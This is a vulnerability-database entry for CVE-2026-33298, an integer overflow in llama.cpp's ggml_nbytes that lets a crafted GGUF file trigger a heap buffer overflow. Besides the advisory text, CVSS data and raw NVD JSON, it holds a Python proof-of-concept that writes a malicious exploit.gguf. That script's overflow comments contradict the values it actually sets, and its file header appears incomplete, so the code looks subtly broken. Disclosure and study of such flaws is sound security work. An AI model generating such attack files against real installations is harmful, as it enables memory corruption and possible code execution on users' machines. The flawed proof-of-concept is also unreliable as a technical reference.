Security Vulnerability Report
中文
CVE-2026-33298 CVSS 7.8 HIGH

CVE-2026-33298

Published: 2026-03-24 01:17:02
Last Modified: 2026-04-30 17:01:02

Description

llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:* - VULNERABLE
llama.cpp < b7824

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-33298: Integer Overflow in llama.cpp ggml_nbytes # This script demonstrates how to craft a tensor dimension that triggers an overflow. import struct def create_malicious_gguf_header(): # GGUF Magic Number magic = b'GGUF' version = struct.pack('<I', 3) # GGUF version 3 tensor_count = struct.pack('<Q', 1) # 1 Tensor # Tensor Name name_len = struct.pack('<Q', 4) name = b'test' # Tensor Dimensions (n_dims) n_dims = struct.pack('<I', 2) # 2 dimensions # Exploit: Set dimensions such that (dim1 * dim2 * type_size) overflows # Assuming type Q4_0 (block size 32 bytes, block count calculated internally) # or simply F32 (4 bytes). If we calculate elements = dim1 * dim2. # If elements = 0x100000001, and type_size = 4, total = 0x400000004. # In 32-bit arithmetic, this wraps to 4. # Triggering the overflow in ggml_nbytes calculation # We want a huge number of elements that wraps to a small size dim1 = 0x10000 dim2 = 0x10000 # Product = 0x100000000 # Pack dimensions dims = struct.pack('<Q', dim1) + struct.pack('<Q', dim2) # Tensor Type (e.g., F32 = 0) tensor_type = struct.pack('<I', 0) # Offset to tensor data (arbitrary for PoC) offset = struct.pack('<Q', 1024) # Constructing a minimal malicious structure (Simplified) payload = magic + version + tensor_count + name_len + name + n_dims + dims + tensor_type + offset print("[+] Malicious GGUF structure generated.") print("[+] Dimensions: {} x {}".format(dim1, dim2)) print("[+] Attempting to save to 'exploit.gguf'...") with open('exploit.gguf', 'wb') as f: f.write(payload) print("[+] File saved. Load this in a vulnerable llama.cpp version to trigger the crash.") if __name__ == "__main__": create_malicious_gguf_header()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33298", "sourceIdentifier": "[email protected]", "published": "2026-03-24T01:17:01.870", "lastModified": "2026-04-30T17:01:02.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix."}, {"lang": "es", "value": "llama.cpp es una inferencia de varios modelos LLM en C/C++. Antes de b7824, una vulnerabilidad de desbordamiento de entero en la función `ggml_nbytes` permite a un atacante eludir la validación de memoria al crear un archivo GGUF con dimensiones de tensor específicas. Esto hace que `ggml_nbytes` devuelva un tamaño significativamente menor al requerido (por ejemplo, 4MB en lugar de Exabytes), lo que lleva a un desbordamiento de búfer basado en montículo cuando la aplicación procesa posteriormente el tensor. Esta vulnerabilidad permite una posible ejecución remota de código (RCE) a través de corrupción de memoria. b7824 contiene una corrección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:*", "versionEndExcluding": "b7824", "matchCriteriaId": "471181FC-F68E-43C2-AC26-06D790AEE75F"}]}]}], "references": [{"url": "https://github.com/ggml-org/llama.cpp/releases/tag/b7824", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}